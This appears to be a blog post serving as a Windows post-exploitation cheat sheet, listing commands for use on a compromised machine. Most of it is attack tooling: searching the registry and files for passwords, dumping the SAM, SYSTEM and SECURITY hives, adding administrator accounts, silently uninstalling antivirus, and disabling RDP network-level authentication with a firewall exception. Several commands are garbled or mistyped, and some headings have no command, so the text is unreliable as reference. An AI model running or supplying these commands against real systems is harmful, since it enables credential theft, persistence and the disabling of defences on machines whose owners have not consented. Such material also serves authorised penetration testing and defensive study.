Windows Post Enumeration
In this blog post, we will learn about manual post enumeration techniques to gather information about the compromised target in order to Escalate Privileges, Data Exfiltration, Persistent Access.
After compromising a device and having system-level access, Now we will gather more information about the target system to get the big scope and escalate our privileges.
The very first command to execute
To get system information
To get system information remotely
systeminfo /S <targetIp> /U <domain>\<user> /P <Password>
To list current user, sid, groups the current user is a member of and their sids as well as current privilege level.
whoami /all
To get OS Version
To check file/folder permissions
To show processes and services in system.
tasklist /svc
To show all processes & DLLs
tasklist /m
To remote process listing
tasklist /S ip /v
To show all environmental variables.
with them.
To show services of system
sc query state=all
net start
To search the registry for passwords/or any string
reg query HKLM /f password /t REG SZ /s
To list all the currently scheduled tasks that your current user has access to see.
To get more information about a service
sc getkeyname <service name> //It will give you a key
sc queryex <keyname>
To get all information about the workstation
net config workstation
To display hosts in the current domain
net view /domain
To list all users in the current domain
net user /domain
To add a user
net user username password /add
To add a user in Administrators
Add user to Administrators
To check network configurations of the system
ipconfig /all
To display local DNS Cache
ipconfig /displaydns
To know the listening ports of the system
netstat -ani findstr LISTENING
To list all open connections
netstat -ana
To prints the password policy for the domain
net accounts /domain
To print the members of Administrators local group
net localgroup administrators
To find active SMB session
net session I find I "\\"
To search files for the password string
findstr /si password' .txt I *.xmll *.xls
To display Domain and DC info
wmic ntdomain list
To search for services with unquoted paths to binary
wmic service get namee,displayname,pathnamee,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
For finding other networks and static routes that have been put in place
route print
To find the file match with the search string
dir \ /s /b | find /I “searchstring
Uninstalling Software “AntiVirus” (Non interactive)
wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /Interactive:Off (this uninstalls software)
To disable network level authentication, add firewall exceptiion
reg add "HKEY LOCAL_MACHINE\SYSTEM\CurentControlSet\Control \Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable
WMI commands
- wmic bios
- wmic qfe
- wmic qfe get hotfixid (This gets patches IDs)
- wmic startup
- wmic service
- wmic os
- wmic process get caption,executablepath,commandline
- wmic process call create “process_name” (executes a program)
- wmic process where name=”process_name” call terminate (terminates program)
- wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size,
- volumeserialnumber (hard drive information)
- wmic useraccount (usernames, sid, and various security related goodies)
- wmic useraccount get /ALL
- wmic share get /ALL (you can use ? for gets help ! )
- wmic startup list full (this can be a huge list!!!)
- wmic /node:”hostname” bios get serialnumber (this can be great for finding warranty info about the target)
Reg Command
- reg save HKLM\Security security.hive (Save security hive to a file)
- reg save HKLM\System system.hive (Save system hive to a file)
- reg save HKLM\SAM sam.hive (Save sam to a file)=
- reg add [\TargetIPaddr] [RegDomain][ \Key ]
- reg export [RegDomain][Key] [FileName]
- reg import [FileName ]
- reg query [\TargetIPaddr] [RegDomain][ Key ] /v [Valuename!] (you can to add /s for recurse all values )
We have discussed some commands to gather information about the compromised target and the techniques to post emumeration